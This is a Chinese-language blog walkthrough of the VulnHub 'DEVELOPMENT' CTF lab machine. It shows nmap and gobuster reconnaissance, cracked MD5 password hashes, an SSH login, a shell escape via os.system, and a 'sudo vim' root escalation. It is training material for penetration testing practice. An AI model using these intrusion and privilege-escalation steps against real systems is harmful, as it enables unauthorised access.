前言
靶机地址:https://download.vulnhub.com/digitalworld/devt-improved.7z
靶机难度:中级(CTF)
靶机发布日期:2018 年 12 月 28 日
靶机描述:这台机器让我们想起了一个开发环境:错误配置占据了主导地位。这是专为OSCP练习而设计的,机器的原始版本用于CTF。它现在复活了,并且比原来的更加邪恶。
如果你必须有关于这台机器的提示(即使他们可能不会对你有很大帮助,除非你在你的机器上扎根!):开发是(#1):与生产不同,(#2):一堆代码,(# 3):建设中。
注意:一些用户报告说,在积极扫描时,该框可能看起来“不稳定”。主页给出了原因的线索。
目标:得到root权限
作者:我是小小白
时间:2021-07-16
请注意:
本博客所有文章,仅供研究测试及学习IT技术之用,严禁传播和用于非法用途,否则所产生的一切后果由观看文章、视频的人自行承担;本博客网以及发帖人不承担任何责任!
信息收集
注意:目标机器网卡可能不会开机自启,需要手动激活下;
需改root密码操作步骤: 1、重启ubuntu,随即长按shift进入grub菜单; 2、选择第二个高级模式recovery mode进入 3、进入Recovery Menu界面,选择root Drop to root shell prompt ,也就是获取root权限 4、敲入:passwd "用户名" 之后再敲两次密码就可以修改用户名密码了。 另外想修改root密码可使用下面的方法: 修改root密码操作:#passwd 输入新密码:# 再输入一遍密码:# 这是设置root密码,如果是设置其它用户密码使用命令:passwd 用户名 即可 5、按ctrl+alt+del重启系统,完成。
主机发现
我们在VM中需要确定攻击目标的IP地址,可以使用netdiscover/nmap来获取目标主机的IP地址:
nmap -sP 192.168.11.0/16 -T5 参数解读: -sP : 用ping扫描判断主机是否存活,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping -T5: 指定扫描过程使用的时序,总有6个级别(0-5),级别越高,扫描速度越快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T5
端口扫描
我们已经找到了目标计算机IP地址:192.168.11.4
第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口T5速度扫描:
nmap -sS -sV -sC -O -T5 -Pn -p- 192.168.11.4 参数解读: -A :启用-A选项之后,Nmap将检测目标主机的下述信息 服务版本识别(-sV); 操作系统识别(-O); 脚本扫描(-sC); Traceroute(–traceroute) -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -sV: 指定让Nmap进行服务版本扫描 -p-:进行全端口扫描 -Pn:禁用主机检测(-Pn)
PORT | SERVICE | VERSION DETECTION |
TCP: 113 | oident | oident |
TCP: 139、445 | Samba | smbd 3.X - 4.X (workgroup: WORKGROUP) |
TCP: 8080 | HTTP | IIS 6.0 |
目录枚举
gobuster dir -u http://192.168.11.4/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 --random-agent
存在异常目录html_pages
指纹识别
漏洞发现
Nikto 扫描
nikto :开源的WEB扫描评估软件,可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等 nikto -h 192.168.11.4 -C all
可能做了限制,没有任何扫描结果;
漏洞利用
HASH破解
admin, 3cb1d13bb83ffff2defe8d1443d3a0eb intern, 4a8a2b374f463b7aedbb44a066363b81 patrick, 87e6d56ce79af90dbe07d387d3d0579e qiu, ee64497098d0926d198f54f6d5431f98
MD5解密,结果如下: admin:无法解密 intern:12345678900987654321 patrick:P@ssw0rd25 qiu:qiu
权限提升
[22][ssh] host: 192.168.11.4 login: intern password: 12345678900987654321
返回交互式shell echo os.system('/bin/bash')
切换到用户patrick,查看文件可以以root身份运行;
这里是利用的vim提权;
sudo vim -c ':!/bin/sh'
可以看到成功提权到root权限。
辅助提权检测脚本
也可以利用linux提权辅助脚本进行快速检测;https://github.com/mzet-/linux-exploit-suggester.git